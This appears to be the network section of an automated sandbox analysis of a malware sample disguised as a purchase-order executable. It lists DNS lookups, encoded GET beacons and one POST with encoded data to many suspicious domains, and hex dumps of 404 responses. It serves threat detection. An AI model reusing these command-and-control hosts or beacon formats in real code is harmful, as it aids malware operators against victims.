            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PO_987654345678.exeCode function: 0_2_00F7CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00F7CE44
            Source: global trafficHTTP traffic detected: GET /xsf1/?0z=mDcdcR8&Qd=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.clientebradesco.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /12ts/?Qd=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.myim.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ftud/?0z=mDcdcR8&Qd=CQmIz2bNYdnQtzE2RxYa2qz/fuFRk+DUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bCnr6auDpWI0NkhYnTr7G4MgOIGUz90I9VfU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.d55dg.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.fineg.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kc69/?Qd=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.asian-massage-us.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ifo8/?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.aflaksokna.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p6o9/?Qd=Zmr/YL1wBhH5EvOYa+lfR7FMwZSqpeTcexp1DhQNUfR7ECek+Jud5GyO11J5h9itVrdZedwNG4+zKYxY7NG/xiBUzJxWpUvsREBgoFXOyFDTB09pGlr6B+k=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.qiluqiyuan.buzzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /45sz/?0z=mDcdcR8&Qd=wkQ2jmS8yMxgRlKbDRWyNF0e8S7IapgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x9uDDBeomzG9S18EgEY/2fSLTGleisJLGxPY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.omexai.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY6YydUJ+eQOaY3qqiNVkH5/URE6MIj12/bE0=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.dfbio.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /cent/?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.healthsolutions.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gxi9/?Qd=Ur1yZ7cx/WDhKbJaAn0jkNNLDG3pddkDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGmZp5Mlx2w1QvKSGogY0wmO8HURKJraqBGaM=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.golbasi-nakliyat.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ibl4/?Qd=JoaaHegl6i+0bHLuLd264Bxd28Hb6zIn2a9w13HpkUvWqM8iIVBE+LpbDbn5e+5yif/ulpJxYQTtoLoBamVQ2AU3CZID6kvfd7ZL4Wu9CurbADaEbfhMIYo=&0z=mDcdcR8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.begumnasreenbano.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.clientebradesco.online
            Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.myim.cloud
            Source: global trafficDNS traffic detected: DNS query: www.d55dg.top
            Source: global trafficDNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global trafficDNS traffic detected: DNS query: www.fineg.online
            Source: global trafficDNS traffic detected: DNS query: www.asian-massage-us.xyz
            Source: global trafficDNS traffic detected: DNS query: www.thriveline.online
            Source: global trafficDNS traffic detected: DNS query: www.aflaksokna.com
            Source: global trafficDNS traffic detected: DNS query: www.esistiliya.online
            Source: global trafficDNS traffic detected: DNS query: www.qiluqiyuan.buzz
            Source: global trafficDNS traffic detected: DNS query: www.omexai.info
            Source: global trafficDNS traffic detected: DNS query: www.dfbio.net
            Source: global trafficDNS traffic detected: DNS query: www.healthsolutions.top
            Source: global trafficDNS traffic detected: DNS query: www.950021.com
            Source: global trafficDNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.begumnasreenbano.com
            Source: unknownHTTP traffic detected: POST /12ts/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 199Host: www.myim.cloudOrigin: http://www.myim.cloudReferer: http://www.myim.cloud/12ts/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36Data Raw: 51 64 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 51 2f 65 32 4f 75 31 73 71 4c 34 32 73 44 31 4d 4c 79 72 68 61 32 44 70 76 78 6f 4f 44 46 5a 32 51 3d 3d Data Ascii: Qd=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QQ/e2Ou1sqL42sD1MLyrha2DpvxoODFZ2Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:44:01 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:44:04 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:44:06 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Sep 2024 08:44:09 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "668fe68e-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:44:28 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:44:30 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:44:33 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 08:44:36 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 